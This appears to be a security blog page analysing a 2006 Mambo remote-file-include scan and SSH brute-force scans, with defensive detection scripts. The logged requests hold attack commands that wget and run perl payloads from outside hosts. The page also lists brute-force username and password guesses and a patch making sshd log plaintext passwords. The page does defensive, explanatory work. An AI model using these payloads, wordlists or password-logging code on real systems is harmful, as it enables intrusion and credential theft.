I don’t need to say much more. The NIST guide to computer security log management is available here. On the bad side, even though they mention swatch, log parser and even the ancient logsentry, they forgot about ossec.
Category: General Security
High volume of web (mambo) scans.
Since Thursday night I'm seeing a high volume of scans on different web servers, possibly for the following vulnerabilities:
http://secunia.com/advisories/14337/
http://www.osvdb.org/displayvuln.php?osvdb_id=10180
However, they say the problem is in function.php and I'm seeing the requests against index.php. Can anyone confirm that?
Some log samples below:
200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:03:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
200.80.39.39 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
217.160.131.47 - - [12/May/2006:16:29:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
58.26.138.159 - - [12/May/2006:16:36:47 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://toma.si/dare/cmd.txt?&cmd=cd%20/tmp;wget%20http://toma.si/dare/xentonix;perl%20xentonix;rm%20-rf%20xentonix? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
212.87.13.140 - - [12/May/2006:16:50:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://radius01.comete.ci/tool.gif?&cmd=cd%20/tmp/;wget%20http://radius01.comete.ci/session.gif;perl%20session.gif;rm%20-rf%20session.*? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
These are just a few from between 15:00 and 17:00 yesterday.
Interestingly, they don't do anything else: they just try to execute it and leave (without searching for other paths)... Btw, I'm seeing these alerts from ossec.
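The requests above all share one shape: a parameter that is supposed to hold a local path (mosConfig_absolute_path) is given a remote URL ending in "?", with a shell command riding along in "cmd". The script below is an added example, not ossec's or the blog author's code, that pulls those indicators out of Apache combined-format log lines and aggregates them per source address; it treats a URL-valued parameter as a remote-file-include probe only when one of the page's indicators is present, so an ordinary redirect-style parameter is not flagged. The sample log lines are constructed (RFC 5737 addresses, example.net hosts) and only mimic the pattern above; the set of known include-path parameter names is an assumption to be extended for other applications.

```python
"""Flag remote-file-include (RFI) probes of the kind shown above in Apache
combined-format access logs. Added example, not part of the original post."""
import re
from collections import Counter
from urllib.parse import unquote

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

URL_RE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)

# Parameter names known to be used as include paths; mosConfig_absolute_path is
# the one from the scan above, the set is an assumption to extend per application.
KNOWN_INCLUDE_PARAMS = {'mosConfig_absolute_path'}

# Constructed sample lines shaped like the scan above (not real captures).
SAMPLE_LOG = """\
192.0.2.10 - - [12/May/2006:15:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://host-a.example.net/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://host-a.example.net/images/tool;perl%20tool;rm%20-rf%20tool? HTTP/1.0" 404 167 "-" "Mozilla/5.0"
192.0.2.11 - - [12/May/2006:15:34:30 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://host-b.example.net/dare/cmd.txt?&cmd=id HTTP/1.0" 404 167 "-" "Mozilla/5.0"
192.0.2.10 - - [12/May/2006:16:27:28 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://host-a.example.net/images/cmd.txt?&cmd=id HTTP/1.0" 404 167 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2006:16:40:00 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.8 - - [12/May/2006:16:41:00 -0300] "GET /index.php?option=com_content&redirect=http://www.example.org/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


def parse_query(target):
    """Split the request target into its path and an ordered list of
    (name, value) pairs. Done by hand instead of urllib.parse.parse_qs so
    that empty values (GLOBALS=) survive and a '?' inside a value is kept."""
    path, _, query = target.partition('?')
    params = []
    for part in query.split('&'):
        if not part:
            continue
        name, _, value = part.partition('=')
        params.append((unquote(name), unquote(value)))
    return path, params


def inspect_line(line):
    """Return a finding dict for an RFI-style probe, or None for other lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, params = parse_query(m.group('target'))
    names = {n for n, _ in params}
    for name, value in params:
        if not URL_RE.match(value):
            continue
        # Indicators seen in the scan above: a known include-path parameter,
        # a 'cmd' parameter in the same request, or a URL ending in '?' so
        # that whatever the application appends becomes a harmless query string.
        if name in KNOWN_INCLUDE_PARAMS or 'cmd' in names or value.endswith('?'):
            cmd = next((v for n, v in params if n == 'cmd'), None)
            return {
                'host': m.group('host'),
                'time': m.group('time'),
                'path': path,
                'param': name,
                'remote_url': value,
                'cmd': cmd,
                'status': int(m.group('status')),
            }
    return None


def scan_log(text):
    """All findings in a block of log text, in file order."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


def hosts_by_attempts(findings):
    """How many probes each source address sent (useful for blocking decisions)."""
    return Counter(f['host'] for f in findings)


if __name__ == '__main__':
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['host']} -> {f['param']} = {f['remote_url']}  cmd={f['cmd']!r}")
    print(hosts_by_attempts(found))
```

Note that the probes on the page all returned 404: the finding still matters, because the same source will typically try the next target in its list, and the per-host counter is what turns a pile of 404s into a block or an alert.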
Interesting information about SSH scans
I spent last week doing some research on the recently very active SSH scans and sent out the following e-mail to the incidents mailing list. Just some clarification before the e-mail itself:
1- My modified version of SSHD is very simple and I won't publish a diff. I basically just downloaded the latest version from openssh.org and added these two lines to auth-passwd.c (on line 80 of the file — just after the beginning of the auth_password function):
/* honeypot only: log every non-empty password guess with the user it was tried against */
if (strlen(password) > 1)
    error("user: %s, pass: %s", authctxt->user, password);
2- Regarding the location of the scans, they look very dispersed (my boxes are in the US). I got two from Brazil, one from the UK, one from NL, one from Japan, two from India (from the same ISP), two from the USA and one from Canada...
I set up some honeypots and also made a few modifications to the ssh daemon to print out the passwords these scans were trying to use. I noticed a reduction in the number of scans, but I still got a few in the last few days. Basically I noticed 2 different scans.

** Scan 1 - Attempts many passwords against the root account and a lot of attempts against common/default accounts (with the password being the same as the account name). Interestingly, some of the passwords for root don't look very simple, and some use keyboard combinations (probably common too). Received scans of this type from 7 different IPs (same passwords, users, etc).

** Scan 2 - Attempts a lot of strange passwords against the root and admin accounts. Look below to see why I think they are strange. Looks like the scanner is broken :) Received scans of this type from 3 different IPs.

*** User, password combinations:

** Scan 1 (user, password combinations):
user root, pass: 1qaz2wsx
user root, pass: 1q2w3e4r5t6y
user root, pass: 1qaz2wsx3edc4rfv
user root, pass: qazwsxedcrfv
user root, pass: webmaster
user root, pass: michael
user root, pass: work
user root, pass: maggie
user root, pass: print
user root, pass: 123456
user root, pass: root1234
user root, pass: 1qaz2wsx3edc
user root, pass: qazwsxedc
user root, pass: qazwsx
user root, pass: internet
user root, pass: mobile
user root, pass: windows
user root, pass: superman
user root, pass: 1q2w3e4r
user root, pass: network
user root, pass: system
user root, pass: administrator
user root, pass: 123qwe
user root, pass: manager
user root, pass: redhat
user root, pass: fedora
user root, pass: okmnji
user root, pass: qwerty
user root, pass: httpd
user root, pass: linux
user root, pass: coder
user root, pass: www
user root, pass: 123123
user root, pass: 1234567890
user james, pass: james
user cvs, pass: cvs
user tony, pass: tony
user bill, pass: bill
user print, pass: print
user maggie, pass: maggie
user info, pass: info
user http, pass: http
user ftp, pass: ftp
user dany, pass: dany
user suse, pass: suse
user oracle, pass: oracle
user tomcat, pass: tomcat
user backup, pass: backup
user id, pass: id
user sgi, pass: sgi
user postgres, pass: postgres
user flowers, pass: flowers
user internet, pass: internet
user linux, pass: linux
user nokia, pass: nokia
user bash, pass: bash
user mysql, pass: mysql
user webmaster, pass: webmaster

** Scan 2 (user, password combinations):
These passwords look very strange... Will anyone ever use a password of root1234567890? :)
user root, pass: root12
user root, pass: root123
user root, pass: root1234
user root, pass: root12345
user root, pass: root123456
user root, pass: root1234567
user root, pass: root12345678
user root, pass: root123456789
user root, pass: root1234567890
user admin, pass: admin
user admin, pass: admin1
user admin, pass: admin12
user admin, pass: admin123
user admin, pass: admin1234
user admin, pass: admin12345
user admin, pass: admin123456
user admin, pass: admin1234567
user admin, pass: admin12345678
user admin, pass: admin123456789
user admin, pass: admin1234567890
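The two scans above are told apart by the shape of their guesses rather than by the source addresses: scan 1 mixes a root word list with "password equals account name" guesses across many accounts, while scan 2 only ever tries root and admin followed by a growing prefix of 1234567890. The script below is an added example, not the author's code, that reads the "user: X, pass: Y" lines the patched auth-passwd.c above prints, labels each guess, and names which scan profile a batch from one source matches. The sample captures are constructed (a handful of lines shaped like the lists above, not the author's captures), and the profile rules are an assumption derived from those lists.

```python
"""Classify password guesses captured by a honeypot sshd into the two scan
profiles described above. Added example, not part of the original post."""
import re
from collections import Counter

# Matches the line format emitted by the error() call added to auth-passwd.c above.
CAPTURE_RE = re.compile(r'user: (?P<user>\S+), pass: (?P<password>.*)$')
DIGIT_RUN = '1234567890'

# Constructed sample captures (not the author's data), one batch per source.
SCAN_A = """\
user: root, pass: 1qaz2wsx
user: root, pass: 123456
user: root, pass: qwerty
user: james, pass: james
user: oracle, pass: oracle
user: postgres, pass: postgres
"""
SCAN_B = """\
user: root, pass: root12
user: root, pass: root123
user: root, pass: root1234567890
user: admin, pass: admin
user: admin, pass: admin1
user: admin, pass: admin1234567890
"""


def parse_captures(text):
    """Extract (user, password) pairs; lines that are not captures are skipped."""
    pairs = []
    for line in text.splitlines():
        m = CAPTURE_RE.search(line)
        if m:
            pairs.append((m.group('user'), m.group('password')))
    return pairs


def classify(user, password):
    """Label one guess:
       'same-as-user'  password identical to the account name (scan 1's account list)
       'user+digits'   account name plus a prefix of 1234567890 (scan 2's pattern)
       'dictionary'    anything else (scan 1's root word list and keyboard walks)"""
    if password == user:
        return 'same-as-user'
    if password.startswith(user):
        tail = password[len(user):]
        if tail and DIGIT_RUN.startswith(tail):
            return 'user+digits'
    return 'dictionary'


def profile(pairs):
    """Summarise one source's guesses: label counts, accounts targeted and the
    scan profile they match ('scan-1', 'scan-2' or 'unknown')."""
    labels = Counter(classify(u, p) for u, p in pairs)
    users = sorted({u for u, _ in pairs})
    total = sum(labels.values())
    if total and labels['user+digits'] + labels['same-as-user'] == total \
            and set(users) <= {'root', 'admin'}:
        kind = 'scan-2'
    elif labels['dictionary'] and labels['same-as-user']:
        kind = 'scan-1'
    else:
        kind = 'unknown'
    return {'kind': kind, 'labels': dict(labels), 'users': users, 'attempts': total}


if __name__ == '__main__':
    for name, text in (('source A', SCAN_A), ('source B', SCAN_B)):
        print(name, profile(parse_captures(text)))
```

The payoff for a defender is in the second profile's "user+digits" rule: an account whose password is its own name followed by a run of digits is exactly what this scanner is built to find, so those are the accounts to audit first, and a batch of guesses that matches a profile can be tied back to the same tool even when it arrives from a new address.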